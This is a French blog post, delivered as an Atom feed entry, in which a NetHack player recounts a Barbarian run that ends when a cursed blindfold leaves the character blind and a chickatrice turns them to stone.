  <content type="text/html" mode="escaped"> &lt;q&gt;Yet Another Stupid Death&lt;/q&gt; dans le langage des joueurs de &lt;a href=&quot;http://fr.wikipedia.org/wiki/NetHack&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;NetHack&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
J'étais pourtant bien parti avec ma barbare (&lt;em&gt;chaotic female human Barbarian&lt;/em&gt;). Les coups de poisse et de chance s'alternaient mais je m'en tirais bien.&lt;br /&gt;
J'ai essayé de lire à plusieurs reprises un livre de sort non-identifié qui m'a joué quelques tours malgré qu'il ne soit pas maudis. Par exemple cela faisait disparaître tout mon or et même arrivé à un niveau 8 d'expérience sa lecture était toujours problématique.&lt;br /&gt;
J'ai aussi eu à faire à deux fantomes à la suite (deux &lt;a href=&quot;http://nethack.wikia.com/wiki/Bones&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;bones files&lt;/a&gt; dans la même partie et à la suite, je ne sais pas si c'est courant...) qui m'ont apporté pas mal d'objets en tout genre mais dont je n'ai pas eu l'occasion de déterminer la &lt;a href=&quot;http://nethack.wikia.com/wiki/BUC&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;béatitude&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Le top, c'est que j'ai eu l'occasion de faire un &lt;a href=&quot;http://nethack.wikia.com/wiki/Wish&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;voeu&lt;/a&gt; en m'asseyant sur un &lt;a href=&quot;http://nethack.wikia.com/wiki/Throne&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;trône&lt;/a&gt; et ainsi d'obtenir un &lt;q&gt;blessed greased +2 silver dragon scale mail&lt;/q&gt; (une armure en écailles de dragon argenté) qui s'est montrée plus qu'efficace :) &lt;br /&gt;
J'ai également pu tuer une &lt;a href=&quot;http://nethack.wikia.com/wiki/Unicorn&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;licorne&lt;/a&gt; dont la corne m'a rendu la vue une fois où j'étais aveuglé.&lt;br /&gt;
&lt;br /&gt;
J'ai pu améliorer mon maniement de la hache, de l'épée ainsi que des dagues... malheureusement la hache a été cassée à un moment en tentant d'ouvrir un coffre :( &lt;br /&gt;
&lt;br /&gt;
Bref tout allait pour le mieux... jusqu'à ce que je vois apparaître au loin une bête &lt;a href=&quot;http://nethack.wikia.com/wiki/Yellow_light&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;lumière jaune&lt;/a&gt;. Par réflexe, je fouille dans mon inventaire puis tombe sur un &lt;a href=&quot;http://nethack.wikia.com/wiki/Blindfold&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;bandeau&lt;/a&gt; que j'utilise pour m'aveugler...&lt;br /&gt;
Seulement ce dernier était maudi... impossible de le retirer !!! J'aurais dû m'en douter puisqu'il faisait parti des éléments récupérés de l'un des fantômes malheureusement je suis allé un peu vite ce coup-çi :( &lt;br /&gt;
&lt;br /&gt;
Sans la moindre idée de comment le retirer, je me déplace avec quelques difficultées car j'avais mangé un &lt;a href=&quot;http://nethack.wikia.com/wiki/Leprechaun&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;leprechaun&lt;/a&gt; qui me faisait me téléporter de manière aléatoire :( &lt;br /&gt;
&lt;br /&gt;
Pour terminer, et après avoir exterminé une bande de chacals sans difficulté (et les yeux toujours bandés), j'ai finalement donné un coup sur une créature qui s'est avéré être une &lt;a href=&quot;http://nethack.wikia.com/wiki/Cockatrice&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;chickatrice&lt;/a&gt;, ce qui m'a transformé en pierre :( &lt;br /&gt;
&lt;br /&gt;
Au final : partie intéressante et 5ème de &lt;a href=&quot;http://www.alt.org/nethack/player-top.php?player=devloop&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;mes meilleurs scores&lt;/a&gt; jusqu'à présent alors que j'aurais sans doute pû aller bien plus loin :( &lt;br /&gt;

&lt;blockquote&gt;Goodbye devloop the Barbarian...&lt;br /&gt;
You turned to stone in The Dungeons of Doom on dungeon level 8 with 10573 points,&lt;br /&gt;
and 989 pieces of gold, after 5310 moves.&lt;br /&gt;
Killer: a chickatrice corpse&lt;br /&gt;
You were level 8 with a maximum of 81 hit points when you turned to stone.&lt;/blockquote&gt;</content>
</entry>
</feed>